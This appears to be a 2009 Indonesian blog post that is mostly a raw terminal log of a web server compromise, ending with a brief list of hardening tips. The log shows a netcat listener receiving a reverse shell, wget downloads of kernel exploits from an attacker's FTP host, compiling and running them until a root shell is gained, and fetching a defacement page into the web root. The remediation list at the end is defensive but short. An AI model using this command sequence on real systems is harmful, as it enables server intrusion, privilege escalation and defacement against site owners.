root@slacker:~# nc -v -n -l -p 42001 listening on [any] 42001 ... connect to [292.138.16.109] from (UNKNOWN) [210.50.2.238] 45646 ls -la total 3816 drwxrwxrwx 4 45234 uname 4096 Sep 21 03:04 ./ drwxrwxrwx 11 45234 uname 4096 Sep 21 02:19 ../ drwxrwxrwx 2 45234 uname 4096 Jul 22 14:12 OverLib/ -rw-rw-rw- 1 45234 uname 2236 Jun 3 07:26 _db_funcs.php -rw-rw-rw- 1 45234 uname 1367 Sep 21 02:23 _error_funcs.php -rw-rw-rw- 1 45234 uname 1368 Sep 21 02:23 _error_funcs.php~ -rw-rw-rw- 1 45234 uname 1483 Jul 22 03:38 _header.php -rw-rw-rw- 1 45234 uname 1594 Jul 8 05:04 _html_head.php -rw-rw-rw- 1 45234 uname 2479 Jul 8 05:04 _image_scaler.php -rw-rw-rw- 1 45234 uname 4268 Jul 14 04:15 _integrity_funcs.php -rw-rw-rw- 1 45234 uname 2077 Apr 11 05:49 _login.php -rw-rw-rw- 1 45234 uname 326 Apr 2 00:01 _logout.php -rw-rw-rw- 1 45234 uname 5529 Jul 5 07:15 _request.js -rw-rw-rw- 1 45234 uname 8835 Jun 7 21:46 _template_component_admin.php -rw-rw-rw- 1 45234 uname 1392 Jun 3 07:26 _template_component_footer.php -rw-rw-rw- 1 45234 uname 11587 Jul 7 06:04 _template_component_gallery.php -rw-rw-rw- 1 45234 uname 1383 Jul 17 05:17 _template_component_generic.php -rw-rw-rw- 1 45234 uname 4987 Jul 5 17:34 _template_component_header.php -rw-rw-rw- 1 45234 uname 4787 Jul 5 07:15 _template_component_image.php -rw-rw-rw- 1 45234 uname 189 Apr 11 00:16 _template_component_login.php -rw-rw-rw- 1 45234 uname 2436 Jul 22 14:12 _template_component_sitemap.php -rw-rw-rw- 1 45234 uname 5513 Jun 3 07:26 _template_parser.php -rw-rw-rw- 1 45234 uname 4094 Jul 5 17:34 common.js -rw-rw-rw- 1 45234 uname 6769 Jul 22 14:12 common.php -rw-rw-rw- 1 45234 uname 2424 Apr 11 05:49 id.php -rw-rw-rw- 1 45234 uname 10350 Jul 17 05:17 mod_gallery.js -rw-rw-rw- 1 45234 uname 7783 Jul 7 06:04 mod_gallery.php -rw-rw-rw- 1 45234 uname 15286 Jul 11 03:39 mod_gallery_funcs.php -rw-rw-rw- 1 45234 uname 9051 Jul 14 04:15 mod_image.js -rw-rw-rw- 1 45234 uname 6751 Apr 11 22:08 mod_image.php -rw-rw-rw- 1 45234 uname 9878 Jul 8 05:04 mod_image_funcs.php -rw-rw-rw- 1 45234 uname 4337 Apr 11 22:08 mod_tag.php -rw-rw-rw- 1 45234 uname 4239 Apr 11 05:49 mod_tag_funcs.php -rw-rw-rw- 1 45234 uname 829 Apr 11 22:08 mod_tag_view.php -rw-rw-rw- 1 45234 uname 17389 Jul 14 04:15 mod_taglist.js -rw-rw-rw- 1 45234 uname 14331 Jul 8 05:42 mod_upgrade.js -rw-rw-rw- 1 45234 uname 4228 Jul 8 05:04 mod_upgrade.php -rw-rw-rw- 1 45234 uname 2785 Jul 12 23:41 mod_upgrade_funcs.php -rw-rw-rw- 1 45234 uname 7290 Apr 11 22:08 mod_user.php -rw-rw-rw- 1 45234 uname 5689 Apr 11 22:08 mod_user_funcs.php -rw-rw-rw- 1 45234 uname 340 Apr 11 22:08 mod_user_view.php -rw-rw-rw- 1 45234 uname 13852 Jul 6 01:02 mod_userlist.js -rw-rw-rw- 1 45234 uname 554 Jul 14 05:30 page_admin.php -rw-rw-rw- 1 45234 uname 649 Jul 14 05:30 page_admin_maintain.php -rw-rw-rw- 1 45234 uname 3700 Jul 14 05:30 page_admin_maintain_image.php -rw-rw-rw- 1 45234 uname 637 Jul 14 05:30 page_admin_orphans.php -rw-rw-rw- 1 45234 uname 1755 Jul 14 05:30 page_admin_tags.php -rw-rw-rw- 1 45234 uname 1816 Jul 14 05:30 page_admin_users.php -rw-rw-rw- 1 45234 uname 2433 Jul 5 07:15 page_gallery_add.php -rw-rw-rw- 1 45234 uname 2978 Jul 17 05:17 page_gallery_view.php -rw-rw-rw- 1 45234 uname 1697 Jul 5 07:15 page_image_add.php -rw-rw-rw- 1 45234 uname 2529 Jun 7 21:46 page_image_view.php -rw-rw-rw- 1 45234 uname 736 Jul 5 07:15 page_image_view_full.php -rw-rw-rw- 1 45234 uname 830 Jul 5 07:15 page_login.php -rw-rw-rw- 1 45234 uname 391 Jul 5 07:15 page_main_view.php -rw-rw-rw- 1 45234 uname 353 Jul 5 07:15 page_sitemap.php -rw-rw-rw- 1 45234 uname 887 Jul 5 07:15 page_upgrade.php -rw-rw-rw- 1 45234 uname 1587 Jan 30 2009 pngfix.js id uid=80(apache) gid=80(apache) groups=80(apache) wget ftp://uname.site88.net/ring0.c --2009-09-21 03:00:15-- ftp://292.138.16.109/ring0.c => `ring0.c' Connecting to 292.138.16.109:21... connected. Logging in as anonymous ... Logged in! ==> SYST ... done. ==> PWD ... done. ==> TYPE I ... done. ==> CWD not needed. ==> SIZE ring0.c ... 4290 ==> PASV ... done. ==> RETR ring0.c ... done. Length: 4290 (4.2K)

0K …. 100% 153M=0s

2009-09-21 03:00:16 (153 MB/s) – `ring0.c’ saved [4290]

ls
OverLib
_db_funcs.php
_error_funcs.php
_error_funcs.php~
_header.php
_html_head.php
_image_scaler.php
_integrity_funcs.php
_login.php
_logout.php
_request.js
_template_component_admin.php
_template_component_footer.php
_template_component_gallery.php
_template_component_generic.php
_template_component_header.php
_template_component_image.php
_template_component_login.php
_template_component_sitemap.php
_template_parser.php
common.js
common.php
id.php
mod_gallery.js
mod_gallery.php
mod_gallery_funcs.php
mod_image.js
mod_image.php
mod_image_funcs.php
mod_tag.php
mod_tag_funcs.php
mod_tag_view.php
mod_taglist.js
mod_upgrade.js
mod_upgrade.php
mod_upgrade_funcs.php
mod_user.php
mod_user_funcs.php
mod_user_view.php
mod_userlist.js
page_admin.php
page_admin_maintain.php
page_admin_maintain_image.php
page_admin_orphans.php
page_admin_tags.php
page_admin_users.php
page_gallery_add.php
page_gallery_view.php
page_image_add.php
page_image_view.php
page_image_view_full.php
page_login.php
page_main_view.php
page_sitemap.php
page_upgrade.php
pngfix.js
ring0.c
gcc ring0.c -o ring0
pwd
/var/www/htdocs/gallery/sources
./ring0
bash: line 8: 6030 Segmentation fault ./ring0
./ring0
bash: line 9: 6102 Segmentation fault ./ring0
id
uid=80(apache) gid=80(apache) groups=80(apache)
./ring0
bash: line 11: 6130 Segmentation fault ./ring0
./ring0
bash: line 12: 6160 Segmentation fault ./ring0
id
uid=80(apache) gid=80(apache) groups=80(apache)
wget ftp://uname.site88.net/wonderbar_emporium.tgz
–2009-09-21 03:03:24– ftp://292.138.16.109/wonderbar_emporium.tgz
=> `wonderbar_emporium.tgz’
Connecting to 292.138.16.109:21… connected.
Logging in as anonymous … Logged in!
==> SYST … done. ==> PWD … done.
==> TYPE I … done. ==> CWD not needed.
==> SIZE wonderbar_emporium.tgz … done.
==> PASV … done. ==> RETR wonderbar_emporium.tgz …
No such file `wonderbar_emporium.tgz’.

wget ftp://uname.site88.net/wunderbar_emporium.tgz
–2009-09-21 03:03:55– ftp://uname.site88.net/wunderbar_emporium.tgz
=> `wunderbar_emporium.tgz’
Connecting to 292.138.16.109:21… connected.
Logging in as anonymous … Logged in!
==> SYST … done. ==> PWD … done.
==> TYPE I … done. ==> CWD not needed.
==> SIZE wunderbar_emporium.tgz … 3491991
==> PASV … done. ==> RETR wunderbar_emporium.tgz … done.
Length: 3491991 (3.3M)

0K ………. ………. ………. ………. ………. 1% 53.9M 0s
50K ………. ………. ………. ………. ………. 2% 75.4M 0s
100K ………. ………. ………. ………. ………. 4% 86.7M 0s
150K ………. ………. ………. ………. ………. 5% 1.63M 1s
200K ………. ………. ………. ………. ………. 7% 181M 0s
250K ………. ………. ………. ………. ………. 8% 203M 0s
300K ………. ………. ………. ………. ………. 10% 206M 0s
350K ………. ………. ………. ………. ………. 11% 125M 0s
400K ………. ………. ………. ………. ………. 13% 97.0M 0s
450K ………. ………. ………. ………. ………. 14% 205M 0s
500K ………. ………. ………. ………. ………. 16% 213M 0s
550K ………. ………. ………. ………. ………. 17% 143M 0s
600K ………. ………. ………. ………. ………. 19% 117M 0s
650K ………. ………. ………. ………. ………. 20% 209M 0s
700K ………. ………. ………. ………. ………. 21% 210M 0s
750K ………. ………. ………. ………. ………. 23% 211M 0s
800K ………. ………. ………. ………. ………. 24% 111M 0s
850K ………. ………. ………. ………. ………. 26% 159M 0s
900K ………. ………. ………. ………. ………. 27% 139M 0s
950K ………. ………. ………. ………. ………. 29% 73.1M 0s
1000K ………. ………. ………. ………. ………. 30% 120M 0s
1050K ………. ………. ………. ………. ………. 32% 122M 0s
1100K ………. ………. ………. ………. ………. 33% 124M 0s
1150K ………. ………. ………. ………. ………. 35% 129M 0s
1200K ………. ………. ………. ………. ………. 36% 159M 0s
1250K ………. ………. ………. ………. ………. 38% 211M 0s
1300K ………. ………. ………. ………. ………. 39% 215M 0s
1350K ………. ………. ………. ………. ………. 41% 159M 0s
1400K ………. ………. ………. ………. ………. 42% 45.4M 0s
1450K ………. ………. ………. ………. ………. 43% 149M 0s
1500K ………. ………. ………. ………. ………. 45% 137M 0s
1550K ………. ………. ………. ………. ………. 46% 163M 0s
1600K ………. ………. ………. ………. ………. 48% 114M 0s
1650K ………. ………. ………. ………. ………. 49% 140M 0s
1700K ………. ………. ………. ………. ………. 51% 158M 0s
1750K ………. ………. ………. ………. ………. 52% 140M 0s
1800K ………. ………. ………. ………. ………. 54% 120M 0s
1850K ………. ………. ………. ………. ………. 55% 138M 0s
1900K ………. ………. ………. ………. ………. 57% 159M 0s
1950K ………. ………. ………. ………. ………. 58% 138M 0s
2000K ………. ………. ………. ………. ………. 60% 114M 0s
2050K ………. ………. ………. ………. ………. 61% 160M 0s
2100K ………. ………. ………. ………. ………. 63% 141M 0s
2150K ………. ………. ………. ………. ………. 64% 159M 0s
2200K ………. ………. ………. ………. ………. 65% 49.9M 0s
2250K ………. ………. ………. ………. ………. 67% 148M 0s
2300K ………. ………. ………. ………. ………. 68% 137M 0s
2350K ………. ………. ………. ………. ………. 70% 160M 0s
2400K ………. ………. ………. ………. ………. 71% 113M 0s
2450K ………. ………. ………. ………. ………. 73% 135M 0s
2500K ………. ………. ………. ………. ………. 74% 163M 0s
2550K ………. ………. ………. ………. ………. 76% 138M 0s
2600K ………. ………. ………. ………. ………. 77% 157M 0s
2650K ………. ………. ………. ………. ………. 79% 141M 0s
2700K ………. ………. ………. ………. ………. 80% 47.1M 0s
2750K ………. ………. ………. ………. ………. 82% 137M 0s
2800K ………. ………. ………. ………. ………. 83% 114M 0s
2850K ………. ………. ………. ………. ………. 85% 158M 0s
2900K ………. ………. ………. ………. ………. 86% 140M 0s
2950K ………. ………. ………. ………. ………. 87% 161M 0s
3000K ………. ………. ………. ………. ………. 89% 141M 0s
3050K ………. ………. ………. ………. ………. 90% 157M 0s
3100K ………. ………. ………. ………. ………. 92% 141M 0s
3150K ………. ………. ………. ………. ………. 93% 162M 0s
3200K ………. ………. ………. ………. ………. 95% 114M 0s
3250K ………. ………. ………. ………. ………. 96% 141M 0s
3300K ………. ………. ………. ………. ………. 98% 159M 0s
3350K ………. ………. ………. ………. ………. 99% 144M 0s
3400K ………. 100% 62.8M=0.06s

2009-09-21 03:03:55 (59.3 MB/s) – `wunderbar_emporium.tgz’ saved [3491991]

tar xvzf wunderbar_emporium.tgz
wunderbar_emporium/
wunderbar_emporium/pwnkernel.c
wunderbar_emporium/tzameti.avi
wunderbar_emporium/wunderbar_emporium.sh
wunderbar_emporium/exploit.c
cd wunderbar_emporium
pwd
/var/www/htdocs/gallery/sources/wunderbar_emporium
id
uid=80(apache) gid=80(apache) groups=80(apache)
./wunderbar_emporium.sh
sh: mplayer: command not found
sh: no job control in this shell
sh-3.1# id
uid=0(root) gid=0(root) groups=80(apache)
sh-3.1# pwd
/var/www/htdocs/gallery/sources/wunderbar_emporium
sh-3.1# cd ../../../../
sh-3.1# pwd
/var/www/htdocs
sh-3.1# wget 292.138.16.109/owning.html
–2009-09-21 03:08:52– http://292.138.16.109/owning.html
Connecting to 292.138.16.109:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 242 [text/html]
Saving to: `owning.html’

0K 100% 27.0M=0s

2009-09-21 03:08:52 (27.0 MB/s) – `owning.html’ saved [242/242]

sh-3.1#

SOLUSI :

1. Gunakan Input Validation yang baik

2. Setting di PHP.INI
– Matikan error_log pada PHP
– Disable Fungsi passthru, exec dan system pada php
– allow_url_fopen = Off
– Safe_mode = On

3. Update Kernel

4. Matikan Komputer Anda, dan kubur dalam-dalam..

5. Update Otak anda,,

Resource: http://logsmylife.wordpress.com/2009/09/22/remote-dan-local-file-inclusion-vulnerability/